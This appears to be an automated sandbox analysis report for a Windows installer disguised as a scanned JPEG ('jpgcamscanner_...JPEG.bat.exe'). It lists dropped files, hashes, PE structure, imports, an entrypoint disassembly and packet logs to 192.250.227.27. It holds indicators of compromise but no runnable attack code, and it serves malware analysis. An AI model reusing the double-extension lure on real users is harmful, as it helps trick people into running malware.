Preview:	......K.....2.>....!..E............8.......]^.....r.....1..........5.d..............5.9.H......8.....#.........D...........j.^B.....................\|q^....\|=.?....<....u..y..........T?..%...].. ........P..C.........$Y......"....m.......6.......@..1..........x.......n.......R.d..8.U...,...d...2.^...........!D.\|.......}..........................].%...a3........LeJW;......?...A..r..P...U....@..^...~..J....I.........K....w1o....H.......3R.$......f...`....\|......f.........!..O.g"..........'......4............l.d.............G...`.......&..\......H..........................5...S.....q..E............r.c.Q...^.....R...........h.........a.>U2.=.........N....i.......s......... p!V.#.<....N?...@..................m}...j<..<..,.......$....4........]..)......w55...#...L.j..]"....{..0......%......8...l._O.lf.........{..............;>G.h.......r..W.........+..P.xX..O...V.(......].......................q...............%g..t.....r........D.....m........T.,.l.....x......,..............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Vandspildet244\Shamponeringers\xenonet.mul

Download File

Process:	C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	2222
Entropy (8bit):	4.914198609346288
Encrypted:	false
SSDEEP:	48:x9sBXkZPHGOxztfW2BRz4eTRXhfltDKM3gfwgcwbUoShcYSi52WX:x1ZPb5W2BRz46bVKMl0bUowSi52WX
MD5:	20B88329E76E4AA925AD7D36061295AD
SHA1:	0E5BFD4A2DFD6149CAAD7801C5318139CBB9BFD5
SHA-256:	75F8686EFE42827DE0CFAF648D5B222400200DA3EF22C2DF00764CAB7F6E500E
SHA-512:	4E47EB1E98EEC1873628DAB77E75532FBD9C51BE5FBA8AB05B69E25500AE873BE1E36C84854F8D4384A3088A95DC0251B1D6342542837F9211949B8840743E60
Malicious:	false
Preview:	......#.....5.#.....F..................+.i..........9............r...h...D..F.....5.%......vz...............I..I`.._.{........S.t.......................0...........K...z.....................T.......G..6.....j......b.........v.H......_..<.E... ...........A.{..p.....}.R.._.@....].B.}...S}.n...Na........p...=W..d.h.5.....*)x....:.................c.........}..z.K...J.s.....\A.......n...u..4.................A.../..8..5..r~...;....0...td.%........>...........k...y.._#.....W...gd4.w...m.......#=.....%....1....../......}..................R.......B...\.....F.....K.5..P..j.6u...;......................4.......S`.o..Q.r..........Z.....s..[.............................g.........................N............./h.............d....w.c.....m......B..4......!....XD...B...Y.....:...........b.........2........iG...u...k...........(.w.................=..h....d.-..>......r......o...............F................[.....5.?.......h.xQ..................+................x............+......u.......XS....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.745778158253723
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	jpgcamscanner_20240521_0072345_JPEG.bat.exe
File size:	379'400 bytes
MD5:	18776562551c3adcdc9f49c013772fbd
SHA1:	ee124b7cd0296b4e524454ab12059b8be60bc002
SHA256:	05df6f3430171cb7db9fa5f6782b8f67b14079b6e1dffbb013c33ca91b1ad5d3
SHA512:	c16b5c1c7822af0bee4d5f9707e00a4513e00b0925844fa3c8ba8afbaf7172d2b185dfaf8b1bc1fdce00c6a44d62d34d5bf611c0a2219de0a030ea2f64767364
SSDEEP:	6144:MDGIRuoQiOd9kyzCiY1vJ/BnA+XCzW8w3hRTMiZ4rbcevq:zItQiOdCyzItA+XLRQiZWC
TLSH:	B8849E90D274A8A6D84312734D3BD9E0216FAF3C9574851F261DB83AA6F734B1367E0E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F......F...G.v.F......F...v...F...@...F.Rich..F.........................PE..L...+.oZ.................`.........

File Icon


Icon Hash:	b4b2b2b2bcb2b669

Static PE Info

General

Entrypoint:	0x4031d6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x5A6FED2B [Tue Jan 30 03:57:31 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	3abe302b6d9a1256e6a915429af4ffd2

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 00409198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004070A0h]
call dword ptr [0040709Ch]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042370Ch], eax
je 00007F82A0BA03D3h
push ebx
call 00007F82A0BA34AAh
cmp eax, ebx
je 00007F82A0BA03C9h
push 00000C00h
call eax
mov esi, 00407298h
push esi
call 00007F82A0BA3426h
push esi
call dword ptr [00407098h]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F82A0BA03ADh
push 0000000Ah
call 00007F82A0BA347Eh
push 00000008h
call 00007F82A0BA3477h
push 00000006h
mov dword ptr [00423704h], eax
call 00007F82A0BA346Bh
cmp eax, ebx
je 00007F82A0BA03D1h
push 0000001Eh
call eax
test eax, eax
je 00007F82A0BA03C9h
or byte ptr [0042370Fh], 00000040h
push ebp
call dword ptr [00407044h]
push ebx
call dword ptr [00407288h]
mov dword ptr [004237D8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 0041ECC8h
call dword ptr [00407178h]
push 00409188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7428	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d000	0x282e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x298	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5f0d	0x6000	dfef90bbbed6c8d8369917b85f400880	False	0.6649169921875	data	6.450520423955375	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1248	0x1400	1c9a524313c13059919ecf8195d205be	False	0.4275390625	data	5.007650149182371	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x1a818	0x400	06c5105864978df88e34770eefada5da	False	0.6376953125	data	5.129587811765307	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x24000	0x19000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3d000	0x282e0	0x28400	e47a7998864b5d4b9b25d40ba1fdb078	False	0.23467221467391305	data	4.288859004027817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x3d328	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.17542588430143144
RT_ICON	0x4db50	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 38016	English	United States	0.2506043725036788
RT_ICON	0x56ff8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.27587800369685767
RT_ICON	0x5c480	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.2593292394898441
RT_ICON	0x606a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.33112033195020746
RT_ICON	0x62c50	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.36843339587242024
RT_ICON	0x63cf8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.4540983606557377
RT_ICON	0x64680	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.5328014184397163
RT_DIALOG	0x64ae8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x64be8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x64d08	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x64d68	0x76	data	English	United States	0.7457627118644068
RT_VERSION	0x64de0	0x1bc	data	English	United States	0.536036036036036
RT_MANIFEST	0x64fa0	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
KERNEL32.dll	GetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
USER32.dll	ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
ADVAPI32.dll	AdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2024 20:14:50.984671116 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.221349001 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.221534014 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.221993923 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.458771944 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464617968 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464632988 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464770079 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464775085 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.464775085 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.464785099 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464796066 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464807987 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464818954 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464829922 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464875937 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464886904 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.464920044 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.464920044 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.464968920 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.464968920 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.465018034 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.701567888 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.701584101 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.701669931 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.701723099 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.701723099 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.701782942 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.701819897 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.701915026 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.701929092 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702033043 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702106953 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702145100 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702219963 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702310085 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702338934 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702378988 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702389002 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702400923 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702496052 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702496052 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702496052 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702507973 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702518940 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702529907 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702550888 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702593088 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702600956 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702613115 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702642918 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702642918 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702691078 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702721119 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702740908 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702740908 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702740908 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.702867031 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.702886105 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.703042030 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.938297033 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938311100 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938400030 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938463926 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.938463926 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.938476086 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938508987 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938560963 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.938615084 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.938615084 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.938819885 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938833952 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938844919 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938855886 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938867092 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938878059 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938889027 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.938945055 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939023018 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939037085 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939048052 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939059019 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939081907 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939135075 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939152956 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939152956 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939201117 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939207077 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939295053 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939299107 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939320087 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939424992 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939424992 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939475060 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939522982 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939527035 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939538956 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939595938 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939636946 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939649105 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939718008 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939738035 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939765930 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939826965 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939835072 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939879894 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.939883947 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939883947 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939980984 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.939991951 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940018892 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940030098 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.940112114 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940138102 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940192938 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.940192938 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.940234900 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940272093 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940283060 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940304995 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.940381050 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940438986 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.940476894 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940516949 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.940522909 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940536022 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:51.940608978 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.940608978 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:51.940706015 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.175352097 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.175436020 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.175503016 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.175559998 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.175616026 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.175642967 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.175642967 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.175672054 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.175708055 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.175734043 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.175795078 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.175797939 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.175795078 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.175857067 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.175914049 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.175923109 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.175968885 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.175970078 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176017046 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176027060 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176065922 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176084042 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176125050 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176141977 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176232100 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176243067 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176301003 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176306963 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176354885 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176409960 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176410913 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176460028 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176465034 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176517963 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176520109 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176574945 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176579952 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176630974 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176659107 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176659107 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176686049 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176740885 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176754951 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176795959 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176804066 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176851034 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176852942 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176902056 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176906109 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.176956892 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.176960945 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177005053 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177016973 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177061081 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177074909 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177109003 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177130938 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177165031 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177186012 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177212954 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177242041 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177295923 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177346945 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177350998 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177395105 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177407026 CEST	80	59326	192.250.227.27	192.168.11.20
May 22, 2024 20:14:52.177443981 CEST	59326	80	192.168.11.20	192.250.227.27
May 22, 2024 20:14:52.177462101 CEST	80	59326	192.250.227.27	192.168.11.20
